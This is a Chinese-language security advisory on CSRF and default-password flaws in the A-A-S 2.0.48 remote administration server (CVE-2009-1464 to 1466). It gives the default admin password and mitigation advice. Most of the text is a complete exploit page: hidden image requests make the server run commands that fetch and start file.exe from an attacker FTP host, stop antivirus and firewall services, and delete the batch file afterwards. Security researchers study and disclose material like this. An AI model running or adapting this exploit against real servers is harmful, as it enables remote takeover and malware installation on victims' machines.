A-A-S服务器跨站脚本和默认口令漏洞

受影响系统:

Klinzmann A-A-S 2.0.48

描述:


BUGTRAQ  ID: 34911
CVE(CAN) ID: CVE-2009-1464,CVE-2009-1465,CVE-2009-1466

A-A-S(Application Access Server)是一个免费的远程管理工具,允许使用基于WEB的客户端通过Internet启动或停止应用或服务。

A-A-S的index.aas页面存在多个跨站请求伪造(CSRF)漏洞:如果已登录的用户查看了恶意网页,远程攻击者就可以借助该用户的浏览器向服务器发出HTTP请求,从而执行任意程序、停止服务或终止进程。

A-A-S默认安装了一个管理帐号,该帐号使用默认口令wildbat且启用了所有的安全权限;此外,A-A-S将管理口令和端口口令仅以base64编码(base64只是编码而非加密,可直接还原)的字符串形式储存在安装目录的aas.ini文件中。

<*来源:Felipe Aragon (felipe@syhunt.com)
  
  链接:http://secunia.com/advisories/35034/
        http://marc.info/?l=bugtraq&m=124213796127278&w=2
*>

测试方法:


<img src="http://[AAS IP or DYNDNS HOST]:6262/index.aas?job=command&action=[command]">
<img src="http://[AAS IP or DYNDNS HOST]:6262/index.aas?job=setservice&action=stop&select=[servicename]">
<img src="http://[AAS IP or DYNDNS HOST]:6262/index.aas?job=killprocess&select=[exename]">

<html>
<body>

<script>
// Javascript is used to force the browser to sequentially load
// the images that will trigger the server commands.

var dd=1000; // default delay time (ms)
var aas_url=’http://[host]:6262′; // target AAS host
var ftp_host=’x.x.x.x’; // attacker ftp host
var ftp_user=’anonymous’;
var ftp_pass=’123456′;
var ftp_commands_file=’aashack.ftp’;
var batch_file=’aashack.bat’;
var attacker_file=’file.exe’; // file to upload

function delay(ms) {
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < ms);
}

function writeimg(job,action,select) {
var act = escape(action);
var sel = escape(select);
document.write(‘<img src="’+aas_url+’/index.aas?job=’+job+’&action=’+act+’&select=’+sel+’" style="visibility:hidden;">’);
}

// Main Functions
function Run(action,dms) { writeimg(‘command’,action,”); delay(dms); }
function Console(cmdline,dms) { Run(‘cmd /C ‘+cmdline,dms); }
function AddFTPCmd(cmdline) { Console(‘echo ‘+cmdline+’>>’+ftp_commands_file,dd); }
function AddBatchLine(line) { Console(‘echo ‘+line+’>>’+batch_file,dd); }
//function Kill(exename) { Run(‘taskkill /f /im ‘+exename,dd); } // alternative way to kill a process
function StopSvc(servicename) { writeimg(‘setservice’,’stop’,servicename); delay(dd); }
function KillProcess(exename) { writeimg(‘killprocess’,”,exename); delay(dd); }

function StopUndesiredServices() {
//StopSvc("somefirewall");
//StopSvc("someantivirus");
//StopSvc("wuauserv"); // Automatic Updates
}

function KillUndesiredProcesses() {
//KillProcess(‘firewall.exe’);
}

AddFTPCmd(ftp_user);
AddFTPCmd(ftp_pass);
AddFTPCmd(‘binary’);
AddFTPCmd(‘get ‘+attacker_file);
AddFTPCmd(‘close’);
AddFTPCmd(‘bye’);
AddBatchLine(‘@echo off’);
AddBatchLine(‘ftp -is:’+ftp_commands_file+’ ‘+ftp_host);
AddBatchLine(‘start ‘+attacker_file);
AddBatchLine(‘del ‘+ftp_commands_file);
AddBatchLine(‘del %0’); // self-destruct
StopUndesiredServices();
KillUndesiredProcesses();
Run(batch_file,dd);
</script>

</body>
</html>

建议:

 


厂商补丁:

Klinzmann
———
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本。在补丁发布之前,建议立即修改默认管理帐号的口令,并避免将A-A-S的WEB管理接口(默认6262端口)直接暴露于Internet:

http://www.klinzmann.name/a-a-s/index_en.html

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
